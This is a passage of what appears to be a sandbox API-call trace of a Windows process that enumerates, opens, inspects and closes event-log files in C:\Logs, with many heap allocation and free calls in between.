hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0072.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0072.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0072.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.108] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.108] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Kernel-WHEA%4Errors.evtx", cAlternateFileName="MIDE4D~1.EVT")) returned 1 [0072.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0072.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0072.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0072.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0072.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0072.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0072.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0072.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0072.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0072.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0072.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0072.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0072.108] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.108] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0072.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0072.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0072.109] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.109] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.109] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.109] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0072.109] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.109] AreFileApisANSI () returned 1 [0072.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx", lpUsedDefaultChar=0x0) returned 51 [0072.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0072.109] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.109] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0072.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0072.109] AreFileApisANSI () returned 1 [0072.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.109] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x46518 [0072.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x46518, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 51 [0072.109] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.110] GetFileType (hFile=0x410) returned 0x1 [0072.110] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46518 | out: hHeap=0x20000) returned 1 [0072.110] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.111] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.111] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.111] CloseHandle (hObject=0x410) returned 1 [0072.111] AreFileApisANSI () returned 1 [0072.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.111] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x45fd8 [0072.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x45fd8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 51 [0072.111] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.111] GetFileType (hFile=0x410) returned 0x1 [0072.111] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0072.111] CloseHandle (hObject=0x410) returned 1 [0072.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.112] AreFileApisANSI () returned 1 [0072.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0072.112] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x45fd8 [0072.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x45fd8, cchWideChar=51 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 51 [0072.112] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45fd8 | out: hHeap=0x20000) returned 1 [0072.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0072.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0072.112] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0072.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.112] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.112] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Kernel-WHEA%4Operational.evtx", cAlternateFileName="MI36C5~1.EVT")) returned 1 [0072.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0072.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0072.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0072.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0072.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0072.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0072.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0072.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0072.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0072.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0072.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0072.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0072.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0072.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0072.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0072.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0072.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0072.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0072.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0072.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0072.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0072.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0072.113] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0072.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0072.113] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.113] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.113] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.113] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.113] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0072.114] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0072.114] AreFileApisANSI () returned 1 [0072.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0072.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0072.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.114] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0072.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0072.114] AreFileApisANSI () returned 1 [0072.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0072.114] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0072.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 56 [0072.114] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.115] GetFileType (hFile=0x410) returned 0x1 [0072.115] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0072.115] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0072.115] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0072.115] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0072.115] CloseHandle (hObject=0x410) returned 1 [0072.115] AreFileApisANSI () returned 1 [0072.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0072.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0072.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76200, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 56 [0072.116] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0072.116] GetFileType (hFile=0x410) returned 0x1 [0072.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0072.116] CloseHandle (hObject=0x410) returned 1 [0072.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0072.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0072.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0072.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0072.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0072.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0072.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0072.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0072.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0072.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0072.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0072.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0072.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0072.116] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0072.116] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0072.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0072.117] AreFileApisANSI () returned 1 [0072.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0072.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0072.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx") returned 56 [0072.117] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50be4414, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50be4414, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0072.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0072.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0072.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0072.117] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0072.117] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.117] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0072.117] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59547c37, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x59547c37, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Known Folders API Service.evtx", cAlternateFileName="MI86D6~1.EVT")) returned 1 [0072.117] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0072.117] 